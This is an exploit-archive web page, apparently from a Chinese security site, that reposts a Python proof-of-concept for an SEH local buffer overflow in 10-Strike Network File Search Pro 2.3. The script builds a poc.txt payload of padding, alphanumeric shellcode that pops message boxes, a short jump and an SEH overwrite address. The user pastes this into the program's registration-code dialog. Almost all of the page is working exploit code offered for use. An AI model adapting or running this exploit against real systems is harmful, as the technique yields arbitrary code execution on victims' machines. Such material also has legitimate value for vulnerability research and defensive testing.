首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow
来源:vfocus.net 作者:malwrforensics 发布时间:2016-12-13  
#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################
 
def write_poc(fname, buffer):
    fhandle = open(fname , 'wb')
    fhandle.write(buffer)
    fhandle.close()
 
fname="poc.txt"
buf = '\x41' * 0xfe0
 
#########################
# Shellcode
# MessageBox ad infinitum
#########################
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")
 
junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenSSL 1.1.0a/1.1.0b - Denial
·Serva 3.0.0 HTTP Server - Deni
·Microsoft Internet Explorer 9
·Microsoft Internet Explorer 9
·Microsoft Internet Explorer 9
·McAfee Virus Scan Enterprise f
·Microsoft Internet Explorer 9
·Samsung Devices KNOX Extension
·OpenSSH 7.2 - Denial of Servic
·Samsung Devices KNOX Extension
·TP-LINK TD-W8951ND - Denial of
·Nidesoft MP3 Converter 2.6.18
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved